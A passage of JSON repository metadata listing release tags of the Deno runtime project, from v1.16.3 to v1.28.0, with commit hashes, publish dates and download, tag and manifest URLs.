s/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download